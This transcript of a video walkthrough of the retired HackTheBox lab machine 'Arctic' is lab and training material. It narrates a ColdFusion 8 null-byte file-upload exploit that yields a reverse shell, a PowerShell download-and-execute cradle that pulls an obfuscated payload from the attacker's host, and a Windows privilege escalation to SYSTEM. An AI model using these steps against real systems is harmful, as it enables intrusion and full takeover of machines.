Hey guys, good news. HackTheBox.eu has retired Arctic, so I get to publish a walkthrough on it. So first things first, we will have to nmap the box to identify any open ports. So that's nmap-sv, enumerate versions, sc, run safe scripts, OA, output all formats, name that nmap, and the IP address of the box, which is 10.10.10.11. Not going to run it because it takes time. I have the results saved, and we can see it's listening on 3 ports. Both 135 and a 49,000 is Microsoft Windows Remote Procedural Call. 8500 Nmap doesn't know exactly, so let's go to this and see what is returned. So 10, 10, 10, 11, 8500. And this takes about 20 to 30 seconds every single request, which is a pain. Maybe that's why it's named Arctic, because it's so slow. The other reason is, we'll find out later, it's running an application called ColdFusion, if you didn't see over here. I have the pages that show us this cache, so we don't have to click this every single time. 8500 returns a directory listing, CFIDE and CFDocs. I right click both, open a new tab. The IDE one has a folder called Administrator, which is interesting, and going to that should reveal a page, if it fully loads correctly, that says ColdFusion 8. So maybe when I come back to that it will. I just don't want to wait the 20 to 30 seconds. So we know it's running ColdFusion 8, so let's do SearchSploit on ColdFusion. And we see a lot. The first thing that jumps out is all these on 8, but they all look like cross-site scripting. Not the most interesting when you look at this one that has file upload, and it's a Metasploit module. File upload's interesting on web servers because if you upload a script, then navigate to it, it can execute said script and you get code execution. So let's load Metasploit, MSF console, rename my window to MSF. And once this loads, we will look for the ColdFusion module. And this one looks like it is the thing we saw in SearchSploit, file upload. So copy this request, use this, and then show the options. Set the R host to 10.10.10.11, set our port to 8500, and then let her run. We see it's started a reverse TCP handler in 10.10.12.194, port 4444, which is my box, and then almost immediately fails. There's no way it can know this request failed so quickly because it takes like 30 seconds for everything to return. If we go back, we do see it did load ColdFusion 8, but no way this exploit fails that quickly. So let's do show advanced options, set verbose to true so we can see what's going on. Run the script, and we don't see any more information. I was hoping we'd see a post request and the server's response. We don't, so I guess the verbose option wasn't coded in the script. We could send this to Burp and then see the request. An easy way to do that would probably be set the proxy variable here to set it to like HTTP localhost 8080, but I'm going to do something slightly different because it may help you when you're running scripts that don't support proxies or they didn't code proxy support in the module. So go over to Burp, go to our proxy tab, options, add a new listener. We'll bind this to port 8500 to make it easy. This could be anything. And we'll redirect this to 10.10.10.11 and port 8500. Set this to OK. We see it is running, and then go to a web browser and go to localhost 8500. And what this is doing is it's saying, well, when it's on 8080 and we don't see a redirect, it's a dynamic proxy, which means our application is going to connect to Burp and tell Burp where to go. When we tell it to redirect, we're killing that dynamic portion. So every time we connect to this socket, it's going to send us to this location. And we see localhost 8500. So now in Burp, we can go to intercept, turn this on, go to terminal, set our host to 127.0.0.1 localhost, and run this again. And now we go to Burp, and we Okay, see the request it's trying to make. I'm not sure why it showed me that 404, but this is what I was expecting to see. So we see, well, let's just send this over to Repeater and drop this and run the script. And I'll explain exactly what's happening while this loads. So we're making a post request to upload.cfm, ColdFusion module. Command file upload, not important. Where the exploit comes in is this current folder k.jsp and then %00. This is a hex encoded null byte, which is a string terminator. We see it finished here. But anyways, what ColdFusion is going to do is it's going to take this current folder and file name variable and combine the two to get the file location. But when null byte is in the middle of the string is going to terminate right here when it's creating the file, and there's no, I guess, extension checks on current folder, only file name. And when it terminates right after this, it uploads the file k.jsp. File name could have been anything. So I'm going to copy this, turn intercept off, and before I do that, let's go back into this and scroll down. Repeater. We see it executing cmd.exe and sending it to 10.10.12.194 port 4444. So open up a new window. Let's name this ncat and start a listener. L listen, V verbose, N don't do DNS, P 4444. And then navigate to that page. Make sure burp is not intercepting. And then wait that 20 to 30 seconds for shell to return. And it is painful to wait this long every single time. So you can imagine why I wanted to debug this in Burp when Meterpreter returned a failure in like 5 seconds, because there's no way it would know an exploit failed within 5 seconds when you make 2 requests and it takes like 30 seconds per request. We see the file finished and we have a shell right here. That is awesome. Unfortunately, this is not Meterpreter. It's only a Reverseshell. So we're going to use a program called Unicorn to make it very easy to load a shell. So opt unicorn.py, and we can see the instructions. If you want to download this, just Google Python unicorn trustedsec, and it's this GitHub page. So /opt unicorn.py, the usage, payload, so we want Windows, Meterpreter, reverse TCP, the IP address of our box, so 10.10.12.194. The port, let's do elite. It's generating the request, and it will output 2 files when this is done. The first file is unicorn.rc, which is all the commands to load the listener in Metasploit. The other one is a file called Powershell.attack, which if we copy and paste this command in, it may return a shell. The command's very long, and I hate sending long commands through because they just don't like working. So first things first, let's go to a Metasploit. We can close this out and then just do MSF console-r unicorn.rc, because that's what the program said to do. And we see it's going to start Metasploit and then automatically start that listener. So processing the file, run all the commands, started, reverse handler on our IP elite. So what I'm going to do is send this to my clipboard, create a new file, exploit.html. It can be anything. Paste it. Going to delete this double quote because I want to get rid of all this PowerShell and just run the PowerShell natively. So get rid of this, and what we're left with is a bunch of encrypted commands to evade antivirus, because that's what Unicorn's default is. So save this, Python-m, simple HTTP server. So we have the HTTP page, rename this to HTTP, I guess. Go back to our shell. We're going to run PowerShell, then double quotes, IEX for invoke expressions. I think it's invoke expression, whatever. New dash object, net.webclient.download string, and then the IP address of our string. So HTTP 10.10.12.194 port 8000 exploit.html. Close that off. And what this does is it tells PowerShell, hey, go to this website and execute anything on that page. It's about as bad as you think. And what that's going to do is it goes to a page, downloads the code, executes it, sends it to Meterpreter, loads Meterpreter. Simple? Kind of. So run that command. We can go to our HTTP thing, and we'll see it hit this probably in 10 seconds, hopefully. If not, we may have goofed. So now we see the website or server requesting our exploit.html. If we go to Metasploit and wait, it should soon start sending the staged payload over to it. There we go. And come on, get the shell. Shell 1 has opened, so sessions-i1. First thing first, sysinfo. And we see the box is 64-bit. I'm running in a 32-bit version of Meterpreter. That's fine for now. Is it get UID to see who I'm running as? I'm running as the Tolus user, so chances are I can get that user flag right now. But we're going to send this to the background, and I'm going to search for something called local exploit suggester. So search suggest, and we're going to use this. This is a post module, so it's going to execute a script to that Meterpreter session. So show options, set session 1, run this, and what this does is it checks for all the KBs applied to that box and recommends exploits. Once this is done, since it's a 64-bit box, I like running this against a 64-bit version of Meterpreter because they return different things. And then after both of these, sometimes I run the PowerShell module called PowerUp if I don't see anything, and that looks at Privesc through service misconfigurations mainly. It doesn't really look that much at exploitation via no patches. So we see it saying, hey, 37 exploit checks are going to be tried. The very first one appears to be vulnerable, and it's going to go through this however many times appear the exploits vulnerable. Shouldn't take too much longer to go through the rest of them. Come on. Okay, so let's go to new window and save this as exploits, I guess. So go back to Metasploit, copy, paste, and now we want to go back, sessions-i1, run ps, because we're going to switch to a 64-bit version of Meterpreter now. Very first thing I look at is I want to go to a process that has this x64 and a 1 here. The 1 means it's interactive, which gives us a few more permissions. We don't see any of those. So now we have to pick one of these x64s to migrate into. We could do PowerShell.exe, but that may be bad because this process may die, and when this dies or Meterpreter session dies, this con host appears to be a much more stable one that may not end so quickly. So let's copy that and migrate into it. Migrating from our PID 2592 to 1120. And when this is done, we'll run sysinfo again and verify we're on a 64-bit version of Meterpreter. So sysinfo, Meterpreter 64, okay. So background that, show options, make sure this is still session 1, and rerun this exploit suggester because it's probably going to show different exploits since it's now checking against 64-bit ones. Come on, load. 14 exploits being checked, and only returns one that appears to be vulnerable. So for good practice, let's go back, save this into our notes. And looking at this, we see MS-1092 is vulnerable on both x86 and 64. So since that reported twice, I'm going to try that one first. So we're going to use this, which is another post-module exploit. Show options. So we want to set this to session 1. Set session 1. Run this. And kill this out real quick because I saw started reverse TCP handler on 172. This is my local IP, and that box doesn't know how to get to that. We have to set it to our VPN IP address. So set lhost to 10.10.12.194 and run this again. So it's preparing the payload, creating the task, going to be sending this over, and just wait patiently and get shell. Enabling task, executing, and we see sending stage. So it started sending Meterpreter session right after this exploit, and we opened a new session. So when I do get UID now, I am NT authority system, which means I am now essentially root on this box. I can go into shell, and then cd /users administrator. It's on desktop, and I could view this file. And that is how you do Arctic. Hope you guys have enjoyed this tutorial. If you did, feel free to subscribe and follow me on Twitter at ipsec. Take care, guys.